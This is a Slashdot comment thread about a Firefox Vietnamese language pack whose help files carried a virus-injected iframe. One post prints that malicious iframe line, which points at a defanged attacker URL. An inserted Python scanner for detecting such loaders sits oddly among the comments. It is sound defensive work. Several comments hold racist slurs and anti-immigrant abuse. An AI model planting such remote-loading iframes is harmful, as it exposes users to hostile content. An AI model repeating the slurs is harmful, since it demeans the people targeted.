And, just like with OpenSource, there is good documentation with different proprietary products as well: Oracle provides some good documentation with their database. The best documentation from them is not free, but the Oracle administration handbook (read: frickin' monstrous club) is very helpful and well-written.

and the lack of quality control.

This is the real issue this time around, and also is hard to nail down exactly what it means. What is quality? Security? Lack of crashes? Useful-to-users? Once again, this is also highly project and problem dependent. Since I've already fanboied the Postgres project, I'll use it again: extremely high quality product for the problem the project attempts to address. You want an ACID database? Look no further. Postgres makes you work really hard if you want to corrupt your data. It even has transactional DDL statements. (Oracle doesn't even have that.) You want security? The entire Postgres project, from the product, to the documentation, and even to the community, practice and preach doing things "the right way."

On the other hand, then there are examples like the OP, that let this trojan creep in. Where's the quality control, you ask? Well, for my purposes, Firefox is still an incredibly high-quality product. From a historical perspective, the community is obviously creative as Firefox had tabbed browsing way before, at least IE. From an English-speaker's security perspective, it's still incredibly secure for me.

If you want to move to other quality-control issues about Firefox, I'll agree with you: the not-beta builds of it (1.x, 2.x) are not very fast and are extremely memory intensive. (I'll decline to comment on FF 3.x until it's no longer in beta.)

To bring this back to documentation, I work on a daily basis with some proprietary tools that also severely lack quality-control. What I find maddening about them, is that I don't even know what I've done wrong. There's not even documentation that "this is a known bug." I have to call tech support to get that information. With OpenSource, I at least know up front that something is buggy.

Sure, OSS has THEORETICAL quality control (because anyone can review it), but how often does that REALLY happen? If someone slipped in a virus into some OSS program (especially easy if they distribute it as a binary), how long, if ever, would it be before anyone caught it?

More often than you might think. That's one of the great ways that version control systems help (RCS, CVS, SVN). They suggest you break up your code creation into neat little chunks, "patches", that can be seamlessly merged back into the overall code base. When someone commits a change to the code base, they don't see the entire code base, they see just the change. When you have lots of people on a project, chances are that piece of code one developer changed will get lots of aggregate eyeball-time. Some projects are even more sticklers than others. For instance, the Linux kernel will not accept large patches that they can't review. If you want to have a fair chance of getting your code into the kernel, the core devs want small, neat little patches that they can individually review. A lot of OpenSource projects are this way. (I can't speak for proprietary systems here, but I imagine they're the exact same.)

The issue here is that you think computers and their hardware/software can be 100% secure. You need to stop thinking that way. The most secure computer would be utterly useless: in the current hardware paradigm, it would have no power cords, no batteries, no monitors, no hard drive, no keyboard, no mouse, no internet cable, and no ram. The best you can hope for is to get in the mindset of secure: don't do dumb things (like giving sensitive passwords over non-SSL connections), or automatically clicking yes to all dialog boxes. In general, be aware of your (virtual) surroundings.

Har har (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#23336428)

Gooks got what they deserve

Breaking News (0)

Anonymous Coward | more than 5 years ago | (#23336454)

In our featured story tonight, we uncover that browser extensions, toolbars, and other add-ons may contain malware. In other news, scientists have discovered that the sky is blue.

Re:Breaking News (0)

Anonymous Coward | more than 5 years ago | (#23337164)

Except that this language pack is from Mozilla, so it's a bit more worrying than some random ne'er do well releasing an intentionally infected addon.

Although this shows that Open Source is also... (2, Insightful)

Assmasher (456699) | more than 5 years ago | (#23336466)

...vulnerable to these sorts of attacks (which anyone with any common sense would already know), the fact that it is such an open process means a greater possibility of earlier detection, faster analysis and response, and the rapid repair of the process which made such a gaffe possible. In the closed source world most of these steps would take exponentially longer, and quite often the process would remain the same.

Re:Although this shows that Open Source is also... (0)

Anonymous Coward | more than 5 years ago | (#23337188)

earlier detection, faster analysis and response, and the rapid repair of the process

This makes me wonder WTF they were doing when it took them weeks to OK uploads at addons.mozilla.org. Will the new way make us wait even longer?

Proprietary software has the same risk (2, Interesting)

jrumney (197329) | more than 5 years ago | (#23336474)

This has nothing to do with Mozilla accepting user-submitted extensions. If anything, that makes them more careful about what they publish. A developer's machine becoming infected with an as yet unknown virus that is undetected by anti-virus scanners is a risk that every software producer faces. How many commercial software vendors even run their developers' code through a virus check when it is committed, let alone running regular anti-virus checks on software they have already released?

Re:Proprietary software has the same risk (1)

NoSCO (858498) | more than 5 years ago | (#23336734)

I'd be inclined to say proprietary software has a higher risk of unintentional infection than OSS, because of the reasons already stated in this thread, and that there is a higher percentage of Windows-based coding platforms. Developer PC gets infected with some new strain, and potentially it goes all the way up the chain before being noticed.

It's when you get into the deliberate infection realms that things start to get murky. I'd argue it's easier to deliberately infect via an OSS plugin than it would be to, say, poison the next release of McAfee AV. However consider the scenario - if this were via McAfee AV rather than an OSS language pack, would we have ever discovered it?

Racists trolls go away (1, Informative)

davidwr (791652) | more than 5 years ago | (#23336478)

Will someone with mod points drive the racist posts down to -2 where they belong?

Ignore this (3, Informative)

Anonymous Coward | more than 5 years ago | (#23336578)

post. removing incorrect mod.

Who cares (-1, Flamebait)

p51d007 (656414) | more than 5 years ago | (#23336630)

Bunch of communists in Viet-Nam anyway. The ones in this country (USA) need to learn English anyway, as anyone who lives in the USA. Learn English, speak English, or get the hell out!

Re:Who cares (0)

Anonymous Coward | more than 5 years ago | (#23336766)

Me no understand. What you say?

OSS BLOWS (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#23336672)

OSS is flawed by nature, the lack of responsibility and financial incentive in addition to a vendor's reputation and survival is why OSS will ultimately die on the vine as scum sucking dickwads with nothing better to do will lure the masses into downloading their malware infected pack.

This is because OSS, being a communal effort and not being the flagship product of a profit driven private sector organization will always be vulnerable to this and it's just getting started.

But this is no surprise to me, it was a matter of time and the idea of OSS was utopian to a fault.

More Slashdot Sensationalism (5, Informative)

MobyDisk (75490) | more than 5 years ago | (#23336768)

The article says:

...That Trojan inserted a banner-ad displaying script into any html file on his system, which included the help files for the language pack.

That meant that anyone installing the language pack would have malicious ad displaying code inside their browser -- which could be used for other exploits.

So the language pack did not have a Trojan. I don't think the language packs even have executable code. The language packs had help files with banner ads in them. That's not even close to what the headline says. But I guess "Vietnamese help files may contain ads" doesn't sound as scary.

(I guess this means Slashdot sensationalism isn't restricted to anti-Microsoft articles.)

Re:More Slashdot Sensationalism (1, Informative)

Anonymous Coward | more than 5 years ago | (#23337280)

To be entirely fair, the headline does not necessarily imply the infection you presume it does. To use 100% correct terminology, the Vietnamese language pack was affected by a virus that had infected the developer's computer.

There is a fine line between affection and infection, but they are regularly used interchangeably.

Not really infected (4, Informative)

hweimer (709734) | more than 5 years ago | (#23336796)

According to the Mozilla Security Blog [mozilla.com] the language pack did not contain any malicious code, but only manipulated HTML files:

The Vietnamese language pack for Firefox 2 contains inserted code to load remote content. This code is the result of a virus infection, but does not contain the virus itself.

Re:Not really infected (0)

Anonymous Coward | more than 5 years ago | (#23336924)

Mod this one up!!!

Here is the actual virus code distributed (0)

Anonymous Coward | more than 5 years ago | (#23336928)

knock yourself out

<iframe src="httx://super.badsite.cn/evil.php"></iframe>

and that's it!, only displayed if someone wants to RTFM in Vietnamese (yeah right)
no executable code at all (certainly not viral unless html is a virus) and the site has no extra security privileges over any other.

seems the Slashdot title is a bit over reactionary considering
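The Mozilla blog quote above and the single injected iframe shown in this post describe the same artifact: bundled HTML help files that pull content from a remote site when rendered. The following scanner is an added example (not Mozilla's code nor anything from the thread) that opens a language pack XPI as a zip archive, parses every HTML member, and reports any element whose URL would fetch from outside the package; the sample pack and its `httx://injected.example/evil.php` URL are constructed here for illustration.

```python
"""Scan the HTML files inside a Firefox language pack (.xpi) for injected remote-content loaders."""
import io
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags whose URL attributes make the browser fetch content as soon as the page renders.
LOADER_ATTRS = {
    "iframe": ("src",), "frame": ("src",), "script": ("src",), "img": ("src",),
    "object": ("data",), "embed": ("src",), "link": ("href",),
}
# Schemes a bundled help page may legitimately use: package-internal references only.
# A relative URL (empty scheme, empty host) is internal too; anything else leaves the pack.
INTERNAL_SCHEMES = {"", "chrome", "resource"}
HTML_SUFFIXES = (".html", ".htm", ".xhtml")


class RemoteLoaderFinder(HTMLParser):
    """Collects (tag, url, line) for every element that loads from outside the package."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):  # also reached for self-closing tags
        for attr in LOADER_ATTRS.get(tag, ()):
            url = dict(attrs).get(attr)
            if url is None:
                continue
            parts = urlsplit(url.strip())
            # Flag unknown schemes (http, https, the defanged "httx", ...) and
            # protocol-relative URLs such as //host/path, which have a host but no scheme.
            if parts.scheme.lower() not in INTERNAL_SCHEMES or (parts.scheme == "" and parts.netloc):
                self.findings.append((tag, url.strip(), self.getpos()[0]))


def scan_html(text):
    """Return [(tag, url, line)] for each remote-content loader in one HTML document."""
    finder = RemoteLoaderFinder()
    finder.feed(text)
    finder.close()
    return finder.findings


def scan_xpi(xpi_bytes):
    """Scan every HTML member of an XPI (a zip archive); return {member: findings} for hits only."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(HTML_SUFFIXES):
                findings = scan_html(zf.read(name).decode("utf-8", errors="replace"))
                if findings:
                    report[name] = findings
    return report


# Constructed sample pack: one clean help page and one carrying an injected iframe
# (hypothetical URL, not the real payload).
CLEAN_PAGE = ('<html><body><h1>Trợ giúp</h1><a href="index.html">Mục lục</a>'
              '<img src="chrome://global/skin/icons/info.png"></body></html>')
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>", '<iframe src="httx://injected.example/evil.php"></iframe></body>')


def build_sample_xpi():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("install.rdf", "<RDF/>")
        zf.writestr("locale/vi/help/index.html", CLEAN_PAGE)
        zf.writestr("locale/vi/help/search.html", INJECTED_PAGE)
    return buf.getvalue()


if __name__ == "__main__":
    for member, hits in scan_xpi(build_sample_xpi()).items():
        for tag, url, line in hits:
            print(f"{member}:{line}: <{tag}> loads {url}")
```

Run against a real pack by passing the file's bytes to `scan_xpi`; the clean page's chrome:// icon and relative links are not reported, only the element that reaches out to a remote host.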

Avoid infections (0, Funny)

Anonymous Coward | more than 5 years ago | (#23336990)

I use trojans to avoid infection...

So it was discovered because ... (1)

Zero__Kelvin (151819) | more than 5 years ago | (#23337014)

Unless this trojan was discovered by analysis of the binary, then this is prima facie evidence that F/OSS tends toward greater security than proprietary software. When the typical person (as this thread shows) exclaims: OMFG, look! A trojan in F/OSS was discovered, but none have been discovered in competing proprietary products! they are wrongly assuming, as has been done over and over in this thread, that the code I cannot see is more secure than what I can see! I mean if I have no way to see the trojan, it isn't there, right?

Instead of saying that more trojans have been found, bear in mind that what is really going on is that more trojans have been discovered and removed. Just because no trojans were discovered and removed from M$ Windows today, that does not mean that there are none that remain undiscovered, and that will never be removed.

Of course, I'm ignoring for the purposes of this post the fact that one very valid definition of M$ Windows is "The most widely distributed trojan in the history of computing". :-)

Easy fix! (1)

atlastiamborn (1252206) | more than 5 years ago | (#23337216)

Surely, all they would have to do to fix this situation is push out another update with a spartan in it. That should take care of that pesky trojan, wouldn't it?

Trojans and viruses on commercial CDs (2, Insightful)

argent (18001) | more than 5 years ago | (#23337300)

There have been a number of incidents of trojans and viruses being distributed in commercial shrinkwrapped software. Firefox was slack, like commercial distributors have now and then been slack. You get caught by surprise, fix the process, and keep going, and keep it from happening again.

If they don't address the process that caused the problem, then start worrying.

This doesn't surprise me... (1)

boneclinkz (1284458) | more than 5 years ago | (#23337320)

This is why I stick with tried and true Internet Explorer, rather than using a second-rate third-party browser just to be contrary.

virus's signature was unknown .. (0, Redundant)

rs232 (849320) | more than 5 years ago | (#23337420)

I didn't know software developers relied on 'virus signatures', I thought they used MD5 hashes [inode.at]. And of course you don't download from any old site. Have sound security practices changed in the meanwhile?